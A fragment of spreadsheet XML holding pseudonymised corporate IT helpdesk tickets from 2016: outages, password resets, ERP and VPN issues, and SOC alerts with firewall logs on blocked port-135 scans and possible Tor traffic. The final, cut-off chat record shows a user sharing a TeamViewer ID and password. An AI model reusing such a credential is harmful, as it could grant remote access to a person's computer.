    <s v="network outage :kingston, pa :site is hard down since at 10:19 am et on 08/22.no backup"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______10:19 am et on 08/22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3"/>
  </r>
  <r>
    <s v="circuit outage:usa, nv - divestiture site:secondary circuit is down since at 10:23 am et on 08/22.primary is up."/>
    <s v="what type of outage:  _____network     _x____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______10:23 am et on 08/22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emails"/>
    <s v="_x000a__x000a_received from: raifstow.gfeymtql@gmail.com_x000a__x000a_hello,_x000a__x000a_i need 4 email account tabs removed from my main email and then 2 new ones added._x000a__x000a_needs to be removed:_x000a_k-hntl usa-grind_x000a_w-hntl usa-grind_x000a_k-na westcoast rrc_x000a_w-na westcoast rrc_x000a__x000a__x000a_ones to be added:_x000a_w-rckf.grind@company.com&lt;mailto:w-rckf.grind@company.com&gt;_x000a_w-rckf.grind@company.com&lt;mailto:w-rckf.grind@company.com&gt;_x000a__x000a__x000a_"/>
    <s v="raifstow gfeymtql"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage:vogelfontein, south africa , sa secondary circuit is down since at 5:41 am et on 08/22.primary circuit is up."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ___5:41 am et on 08/22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email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roadking features"/>
    <s v="the features on the road king page are not expanding. on click, there is a div container that is supposed to open up and show additional content. this is no longer working._x000d__x000a__x000d__x000a_page:_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_see screenshot attached."/>
    <s v="lenxvcbq vwnhjtoi"/>
    <x v="50"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="rzglsoma qkjfwmnz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit vpn client"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fmhlugqk.dpraethi@gmail.com_x000d__x000a__x000d__x000a_hallo meine herren,_x000d__x000a__x000d__x000a_ich kann unsere vpn nicht benutzen._x000d__x000a_folgende fehlermeldungen habe ich bekommen:_x000d__x000a__x000d__x000a_2mal kommt diese:_x000d__x000a_[cid:image001.png@01d1fc9a.c5af05c0]_x000d__x000a__x000d__x000a_bei dritte probieren:_x000d__x000a_[cid:image002.png@01d1fc9a.c5af05c0]_x000d__x000a__x000d__x000a_benutzername und kennwort war in ordnung._x000d__x000a_bitte es kontrollieren und lÃ¶sen._x000d__x000a__x000d__x000a_danke_x000d__x000a__x000d__x000a_Ã¼dvÃ¶zlettel / mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="fmhlugqk dpraethi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to erp SID_34"/>
    <s v="unable to log in to erp SID_34"/>
    <s v="varldgiw hfyogqnj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="require access to canadian legal reporting website...thank you in advance!"/>
    <s v="_x000a__x000a_received from: wznkpjis.rantlypb@gmail.com_x000a__x000a_[cid:image001.png@01d1fc62.e2977201]_x000a__x000a_wznkpjis rantlypb, b.sc., tsrp_x000a_sr. ehs analyst_x000a_wznkpjis.rantlypb@gmail.com&lt;mailto:wznkpjis.rantlypb@gmail.com&gt;_x000a_"/>
    <s v="wznkpjis rantlypb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user not able to connect to t drive "/>
    <s v="user not able to connect to t drive "/>
    <s v="crkdjbot qiztrxne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for aedzqlvj.mkosyxgh@gmail.com"/>
    <s v="_x000d__x000a__x000d__x000a_from: nwfodmhc exurcwkm _x000d__x000a_sent: monday, august 22, 2016 3:21 pm_x000d__x000a_to: bmhxwvys tdmgolwn_x000d__x000a_cc: tiyhum kuyiomar_x000d__x000a_subject: re: sabrthy request to reset microsoft online services password for bmhxwvys.tdmgolwn@gmail.com_x000d__x000a__x000d__x000a_hi suhrhtyju,_x000d__x000a__x000d__x000a_please reset your password in _x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="aedzqlvj mkosyxgh"/>
    <x v="33"/>
  </r>
  <r>
    <s v="collaboration_platform issue"/>
    <s v="collaboration_platform issue"/>
    <s v="crqonkxm ipyazqjx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="tmbxvipy knsdqlbx"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" request to reset microsoft online services password for bmhxwvys.tdmgolwn@gmail.com"/>
    <s v="_x000d__x000a__x000d__x000a_from: nwfodmhc exurcwkm _x000d__x000a_sent: monday, august 22, 2016 3:21 pm_x000d__x000a_to: bmhxwvys tdmgolwn_x000d__x000a_cc: tiyhum kuyiomar_x000d__x000a_subject: re: sabrthy request to reset microsoft online services password for bmhxwvys.tdmgolwn@gmail.com_x000d__x000a__x000d__x000a_hi suhrhtyju,_x000d__x000a__x000d__x000a_please reset your password in _x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="bmhxwvys tdmgolwn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype calls not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pyrtfdxu.nxfkqmoy@gmail.com_x000d__x000a__x000d__x000a_i can't make a skype call through my pc.  i can't hear them and they can't hear me._x000d__x000a__x000d__x000a_"/>
    <s v="pyrtfdxu nxfkqmoy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="logon missing in erp"/>
    <s v="name:mitctdrh whaley_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:trhuymvb.egpcwrkj@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:erp issue, cant login! login not available"/>
    <s v="trhuymvb egpcwrkj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="symantec software message"/>
    <s v="_x000d__x000a__x000d__x000a_received from: doxmlcpr.xjheyscu@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_               please see attached symantec message i keep getting every time a switch my lap top on._x000d__x000a__x000d__x000a_"/>
    <s v="doxmlcpr xjheyscu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account lockout"/>
    <s v="windows account lockout"/>
    <s v="wbgxieyh zvasjtdc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to boot system to windows"/>
    <s v="unable to boot system to windows"/>
    <s v="fhiauwkz vwcqrohl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="netweaver password is not working."/>
    <s v="netweaver password is not working."/>
    <s v="lqxhoyic ojxkuftc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bluetooth mouse is not working."/>
    <s v="bluetooth mouse is not working."/>
    <s v="ubqiygva zdkfxyel"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login past see"/>
    <s v="unable to login past see"/>
    <s v="bkzcfmse naslrwdb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( dsw incident no ) : suspicious ms-rpc/ms-ds/netbios activity - HostName_1089"/>
    <s v="========================_x000a_incident overview_x000a_=========================_x000a_we have detected at least 114 occurrences of your firewall company-internal-asa.company.com-1/18.79.63.203 dropping traffic sourcing from HostName_1089/41.53.25.402 and destined to port 135 of one or more destination devices. this activity may indicate one of the following:_x000a_ 1. an infection on this host_x000a_ 2. a misconfigured firewall_x000a_ 3. a misconfigured host_x000a_ 4. port scan (authorized or unauthorized)_x000a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a__x000a_1) ticket only escalation for these alerts where the traffic was blocked (explicit notification via a medium priority ticket (no phone call))_x000a_2) automatically resolve these alerts where the traffic was blocked to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000a__x000a_sincerely,_x000a_secureworks soc_x000a__x000a_=========================_x000a_technical details_x000a_=========================_x000a_historically, there have been various worms/malware that have used ports 135, 137, 138, 139, and 445 to propagate. examples include:_x000a_-w32.blaster.worm/msblast/lovsan _x000a_-w32.welchia/nachi_x000a_-w32.reatle_x000a__x000a_port 135 - microsoft epmap (end point mapper), also known as dce/rpc locator service_x000a__x000a_port 137 - netbios netbios name service_x000a__x000a_port 138 - netbios netbios datagramdnty service_x000a__x000a_port 139 - netbios netbios session service_x000a__x000a_port 445 - microsoft-ds smb file sharing_x000a__x000a_additional information on these ports and best practices can be found at the following sites:_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_=========================_x000a_references_x000a_=========================_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: _x000a_event id: 307897058_x000a_event summary: internal outbreak for 135/tcp_x000a_occurrence count: 114_x000a_event count: 1_x000a__x000a_host and connection information_x000a_source ip: 41.53.25.402_x000a_source hostname: HostName_1089_x000a_source port: 57257_x000a_destination hostname: apusm014_x000a_destination port: 135_x000a_connection directionality: internal_x000a_protocol: tcp_x000a__x000a_device information_x000a_device ip: 18.79.63.203_x000a_device name: company-internal-asa.company.com-1_x000a_log time: 2016-08-21 at 00:15:40 utc_x000a_action: blocked_x000a_cvss score: -1 _x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 537074_x000a_inspector rule id: 186739_x000a_inspector event id: 042405443_x000a_ontology id: 200020003203009144_x000a_event type id: 200020003203009044_x000a_agent id: 103611_x000a__x000a_event detail:_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57257 to 10.44.23.31/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57258 to 12.41.82.8126/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57418 to 14.63.28.418/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57427 to 47.92.04.2434/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57421 to 28.04.06.289/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57477 to 45.34.25.3417/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57478 to 51.25.46.284/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57260 to 10.16.14.113/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57259 to 70.87.83.79245/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57261 to 37.10.37.1764/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57262 to 72.37.71.786/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57263 to 10.16.114.16/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57264 to 54.72.31.824/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57265 to 96.78.23.4576/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57442 to 93.47.24.501/135 flags syn on interface inside_x000a_aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57447 to 63.96.56.492/135 flags syn on interface inside"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="11"/>
  </r>
  <r>
    <s v="downgrade to ie10"/>
    <s v="downgrade to ie10"/>
    <s v="lduqxywt wcydjgvl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ess password reset"/>
    <s v="ess password reset"/>
    <s v="tmbxvipy knsdqlbx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="warehouse_tool quality issues when high link utlization at usa"/>
    <s v="warehouse_tool quality issues when high link utilization at usa, "/>
    <s v="jvhqyamt wodzrcjg"/>
    <x v="3"/>
  </r>
  <r>
    <s v="account locked out"/>
    <s v="account locked out"/>
    <s v="qoiyjcah zxevofwn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call // gso"/>
    <s v="blank call // gso"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to wifi"/>
    <s v="unable to connect to wifi"/>
    <s v="lrbjqcmh jbiwtzqr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="monitor orientation error"/>
    <s v="monitor orientation error"/>
    <s v="ihozauxs ohdqmipz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company owned iphone stolen"/>
    <s v="company owned iphone stolen"/>
    <s v="tskvmwag awkrdqzb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="microsoft password reset "/>
    <s v="microsoft password reset "/>
    <s v="rdwpangu lybaxonw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="qlhmawgi sgwipoxn password not working"/>
    <s v="name:inhekdol anvqzdif_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:inhekdol.anvqzdif@gmail.com_x000a_customer number:_x000a_telephone:x2231_x000a_summary:please call aerp. spengineering toolometer computer is down. no foundry posrt floor samples can be analyzed. will have to shut down posrting floor. critical!"/>
    <s v="inhekdol anvqzdif"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please get some ramdnty for me.  "/>
    <s v="please get some ramdnty for me.  "/>
    <s v="qnvjhgmc nicvbrzg"/>
    <x v="2"/>
  </r>
  <r>
    <s v="etime is not working"/>
    <s v="etime is not working"/>
    <s v="nhixruet elnjqdwg"/>
    <x v="2"/>
  </r>
  <r>
    <s v="please check josh's % in the phones"/>
    <s v="please check josh's % in the phones"/>
    <s v="anpwcmdh tjsgualn"/>
    <x v="2"/>
  </r>
  <r>
    <s v="setup access for ethics"/>
    <s v="setup access for ethics"/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="server migration germany - we are not able to access any files in folder ce_cs at the new server"/>
    <s v="server migration germany - we are not able to access any files in folder ce_cs at the new server"/>
    <s v="xpcunegv eyxwmzgk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( #in33669678 ) : possible tor activity - source: android-802d0edc4e509a9"/>
    <s v="source ip: 93.115.241.50_x000a_source hostname: 93.115.241.50.ch-center.com._x000a_destination ip: 10.16.85.116_x000a_destination hostname: android-802d0edc4e509a9_x000a_system name :_x000a_user  name:pethrywr sahl(sghtyhlp)_x000a_location : koenigsee_x000a_sep , sms status : no updates_x000a_field sales user ( yes / no) :  no_x000a_dsw event log:see below_x000a_----------------------------------------------------------------------------------------_x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: _x000a_event id: 307636804_x000a_event summary: denied icmp trafficdenied icmp type=3, code=3_x000a_occurrence count: 4_x000a_event count: 1_x000a__x000a_host and connection information_x000a_source ip: 209.126.230.71_x000a_source hostname: internetsurvey-2.erratasec.com._x000a_source ip geolocation: atlanta, usa_x000a_connection directionality: incoming_x000a_protocol: icmp_x000a__x000a_device information_x000a_device ip: 18.79.63.203_x000a_device name: company-internal-asa.company.com-1_x000a_log time: 2016-08-20 at 00:21:56 utc_x000a_action: blocked_x000a_cvss score: -1 _x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 756571_x000a_inspector event id: 041814438_x000a_ontology id: 200020003203009212_x000a_event type id: 200020003203009112_x000a_agent id: 103611_x000a__x000a_event detail:_x000a_aug 20 00:21:56 18.79.63.203 %asa-3-313001: denied icmp type=3, code=3 from 209.126.230.71 on interface outside"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="server migration germany; contactperson: cioehrnq wfyhgelz &lt;cioehrnq.wfyhgelz@gmail.com&gt;"/>
    <s v="no access to data on the server! can't proceed customer orders!"/>
    <s v="gbtshxqn nbvmceyx"/>
    <x v="11"/>
  </r>
  <r>
    <s v="erp won't allow me to create an attachment to customer account"/>
    <s v="when trying to attach tax exemption forms to the customer account in erp, i am not able to access the network drive they are stored on and am receiving an error message. i have attached the message to this incident. i am trying to access the &quot;m&quot; drive. "/>
    <s v="bixvmnar glakoprc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user has questions on the use of password_management_tool password manager."/>
    <s v="user has questions on the use of password_management_tool password manager."/>
    <s v="tskvmwag awkrdqzb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="everytime i click something in erp i hear an annoying clcking sound.also when i try to access a document "/>
    <s v="at the header  i get this pop up   erp gui  security that says  the system is trying to create the file_x000d__x000a__x000d__x000a_c:\erp\erp gui\35683166confirmationofhpcpo#113568_20160822132958.453_x.msg_x000d__x000a__x000d__x000a_in the directory_x000d__x000a__x000d__x000a_c:\erp\erp gui\_x000d__x000a__x000d__x000a_do you want to usa the permission to modify the parent directory and all its subdirectories?_x000d__x000a__x000d__x000a_and gives me a choice of allow, deny or help   _x000d__x000a__x000d__x000a_i cannot open the attachment_x000d__x000a_"/>
    <s v="nibaotpy vmxathog"/>
    <x v="0"/>
  </r>
  <r>
    <s v="replacing current laptop"/>
    <s v="thomklmas is replacing current laptop."/>
    <s v="xioapjvd yiqubxmz"/>
    <x v="2"/>
  </r>
  <r>
    <s v="will not come up"/>
    <s v="not showixepyfbga wtqdyoin drive at all"/>
    <s v="hdfcwmag plxstkad"/>
    <x v="2"/>
  </r>
  <r>
    <s v="my email isn't updating in the morning"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pjxclyhs.fcniljtu@gmail.com_x000d__x000a__x000d__x000a_kind "/>
    <s v="pjxclyhs fcniljtu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_852749"/>
    <s v="ticket update on inplant_852749"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password problem"/>
    <s v="hello,_x000d__x000a__x000d__x000a_my password is locked when i log in company network. i have to sign in "/>
    <s v="wmrozfpt ltgcofqp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="audio not working"/>
    <s v="audio not working"/>
    <s v="sbvlxuwm yanbikrx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp blank screen"/>
    <s v="erp blank screen"/>
    <s v="wvqgbdhm fwchqjor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to start the computer. its showing startup repair."/>
    <s v="unable to start the computer. its showing startup repair."/>
    <s v="yhzdtkla ncobgtdm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/22/2016 08:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/22/2016 08:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="reset passwords for horeduca ogrhivnm using password_management_tool password reset."/>
    <s v="the"/>
    <s v="horeduca ogrhivnm"/>
    <x v="16"/>
  </r>
  <r>
    <s v="erp SID_34 password reset (requested by ughzilfm cfibdamq)"/>
    <s v="erp SID_34 password reset (requested by ughzilfm cfibdamq)"/>
    <s v="sqlmtixr urhbvfgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i am trying to open a file attached to a crm and the extension is .rar i cannot open this file"/>
    <s v="the is a file attached to a crm i am trying to work on and it has .rar as the extension.  i cannot open this file and i do not know what a .rar file is."/>
    <s v="iljahycm cknjzewf"/>
    <x v="2"/>
  </r>
  <r>
    <s v="read and write access for m drive folder"/>
    <s v="_x000a__x000a_received from: nrbgctwm.kfwdhrmt@gmail.com_x000a__x000a_hi,_x000a__x000a_please provide read and write access of following folders in m drive_x000a__x000a_m:\pu5 coating data base\database\production data day wise_x000a_m:\pu5 coating data base\database\production data month wise_x000a_m:\pu5 coating data base\database\pu5 production database_x000a__x000a_computer name and user id details are as per the below list_x000a_slno_x000a__x000a_system number_x000a__x000a_user i.d_x000a__x000a_access_x000a__x000a_read_x000a__x000a_write_x000a__x000a_1_x000a__x000a_awyw8911478_x000a__x000a_awysinic2_x000a__x000a_[cid:image001.png@01d1fca0.50f1dd10]_x000a__x000a_[cid:image001.png@01d1fca0.50f1dd10]_x000a__x000a__x000a__x000a_sbfhydeep kurtyar _x000a_pu5 coating and grinding operations_x000a_nrbgctwm.kfwdhrmt@gmail.com&lt;mailto:nrbgctwm.kfwdhrmt@gmail.com&gt;_x000a_"/>
    <s v="nrbgctwm kfwdhrmt"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to outlook "/>
    <s v="unable to outlook "/>
    <s v="nsqwfchp eqgoitdn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for mfvkxghn mzjasxqd on other / SID_1 in erp"/>
    <s v="i need my password set for the quality assurance area SID_1"/>
    <s v="mfvkxghn mzjasxqd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bitte einen arbeitszeitplan erstellen fÃ¼r die mitarbeiterin rnibmcve xukajlvg, pers.-nr. 58938"/>
    <s v="bitte einen arbeitszeitplan erstellen fÃ¼r die mitarbeiterin rnibmcve xukajlvg, pers.-nr. 58678938:_x000a_sollarbeitszeit/woche:   17,5 stunden_x000a_arbeitstage:   dienstag, donnerstag, samstag_x000a_start: 13.09.2016"/>
    <s v="ltxzfcgm sxvigclz"/>
    <x v="51"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="aglsimtd ovnyhizx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0428491"/>
    <s v="ticket update on ticket_no0428491"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_746w failed in job_scheduler at: 08/22/2016 08:08:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_746w failed in job_scheduler at: 08/22/2016 08:08:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="skype -disconnecting of skype calls- more then 5 times in 5 minutes from koenigsee to germany during a conference call"/>
    <s v="skype - disconnecting of skype calls - more then 5 times in 5 minutes from koenigsee to germany during a conference call_x000d__x000a_also internetconnection is very slow"/>
    <s v="qdxyifhj zbwtunpy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account getting locked each monday"/>
    <s v="account getting locked each monday"/>
    <s v="xmebhckt yrnwqfbp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="atualizaÃ§Ã£o programdntya ted"/>
    <s v="preciso entregar as declaraÃ§Ãµes e o programdntya ted nÃ£o estÃ¡ funcionando."/>
    <s v="frjpkuwq rtznexbq"/>
    <x v="62"/>
  </r>
  <r>
    <s v="vip 2 symantec login does not synch passwords through hitacni password system; how to update &amp; synch symantec password?"/>
    <s v="vip 2 symantec login does not synch passwords through hitacni password system; how to update &amp; synch symantec password?"/>
    <s v="stdezpqw bkmeuhfz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="voalfshq eihcmgnl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/22/2016 07:48:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/22/2016 07:48:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="zugriffsrechte auf den ordner ce-teamleiter"/>
    <s v="freigabe durch hr. grergtger"/>
    <s v="wfbkucds qaxhbois"/>
    <x v="0"/>
  </r>
  <r>
    <s v="set back document "/>
    <s v="t: +49_x000a_please set back this document to status 01.06.2016_x000a_m:\dispo\avfertigungszeiten\arbeitsplaner-arbeitssteuerer\te-beschichtung\te-fÃ¼r schneidplatten\te - sk-pvd beschichten auf metaplasanlage .xls_x000a_"/>
    <s v="pjrhqkne ewruqyds"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to login to erp"/>
    <s v="SID_34 - erp production account locked out"/>
    <s v="krutjqwp qomksnhd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/22/2016 07:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/22/2016 07:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="reset password for erp - vvkthyiska account blocked"/>
    <s v="_x000a__x000a_received from: krutjqwp.qomksnhd@gmail.com_x000a__x000a_hello team,_x000a__x000a_could you please reset my password for the erp, user vvkthyiska, by mistake i blocked my account, i entered 3 times the wrong password._x000a__x000a_"/>
    <s v="krutjqwp qomksnhd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="help with excel that updates from crm"/>
    <s v="_x000a__x000a_received from: eqwaiphc.qxwfeuth@gmail.com_x000a__x000a_could you please advise what steps i should take to allow the attached spreadsheet to refresh data from crm?   below is the error message that i get when i open and enable content._x000a__x000a_[cid:image001.jpg@01d1fc45.6ce205f0]_x000a__x000a_mictbdhryhle w.  burnhntyham_x000a_regional key account manager â€“ msc east coast_x000a_eqwaiphc.qxwfeuth@gmail.com&lt;mailto:eqwaiphc.qxwfeuth@gmail.com&gt;_x000a_"/>
    <s v="eqwaiphc qxwfeuth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="missing archive email"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rcbdyslq.zuspjbtw@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i don't have archive emails. the lauacyltoe hxgaycze i can found is from 2014 and i should be able to see emails from 2012._x000d__x000a_my local pc support ojrplsmx wslifbzc already checked it and he can't find it as well._x000d__x000a__x000d__x000a_i urgently need emails from 2013!_x000d__x000a_please advise_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="rcbdyslq zuspjbtw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/22/2016 07:14:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/22/2016 07:14:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="misplaced password"/>
    <s v="password misplaced"/>
    <s v="djwkpmhl kbgjnywa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="edi bestellungen der ksb ag"/>
    <s v="sehr geehrte damen und herren,_x000d__x000a__x000d__x000a_kÃ¶nnen sie mich bitte zu den edi bestellungen der ksb ag kurz anrufen?_x000d__x000a__x000d__x000a__x000d__x000a_freundliche grÃ¼ÃŸe / kind "/>
    <s v="pxsghrjd wiehqmka"/>
    <x v="61"/>
  </r>
  <r>
    <s v="re: deployment notification | telephony_software 2016"/>
    <s v="_x000d__x000a__x000d__x000a_received from: urvitans.laqdwvgo@gmail.com_x000d__x000a__x000d__x000a_hi can we run the deployment once for the german language for the former germany location._x000d__x000a_for the following targets_x000d__x000a__x000d__x000a_efdl8111324_x000d__x000a_efdl8111336_x000d__x000a_efdw8111224_x000d__x000a_efdw8111372_x000d__x000a_efdl8111328_x000d__x000a_efdl8111169_x000d__x000a_edfl8111329_x000d__x000a_edfl8111361_x000d__x000a_edfw8111363_x000d__x000a_edfl8111326_x000d__x000a_edfw8111143_x000d__x000a_edfw8111360_x000d__x000a_edfw8111133_x000d__x000a_edfl8111320_x000d__x000a_efdw8111134_x000d__x000a__x000d__x000a_please let me know when we can plan this._x000d__x000a__x000d__x000a_as the location is just moved this weekend we can't do it manually right now._x000d__x000a__x000d__x000a_"/>
    <s v="urvitans laqdwvgo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset password - karnos"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zrpemyab.xvzwcbha@gmail.com_x000d__x000a__x000d__x000a_dear it team,_x000d__x000a__x000d__x000a_please help reset password for user :  karnos_x000d__x000a__x000d__x000a_"/>
    <s v="bmhxwvys tdmgolwn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i'm no more able to find a folder in outlook."/>
    <s v="ic_x000d__x000a_ welcome, our next available agent will be with you shortly..._x000d__x000a_ all agents are busy assisting other customers._x000d__x000a_ interaction alerting agent._x000d__x000a_ website visitor has joined the conversation_x000d__x000a_gxuvbcpr libcktnm_x000d__x000a_ hello_x000d__x000a_dwfiykeo argtxmvcumar3_x000d__x000a_ hello_x000d__x000a_gxuvbcpr libcktnm_x000d__x000a_ i'm sorry to disturb you for such an issue but i'm no more able to find a folder in my outlook_x000d__x000a_ i don't think i deleted it but i can't see it anymore_x000d__x000a_dwfiykeo argtxmvcumar3_x000d__x000a_ can i have access to your system, please ?_x000d__x000a__x000d__x000a_gxuvbcpr libcktnm_x000d__x000a_ sure. what way?_x000d__x000a_ teamviewer or skype?_x000d__x000a_dwfiykeo argtxmvcumar3_x000d__x000a_ team viewer , please _x000d__x000a_gxuvbcpr libcktnm_x000d__x000a_ id: 924881243_x000d__x000a_ pw: 6749_x000d__x000a_gxuvbcpr 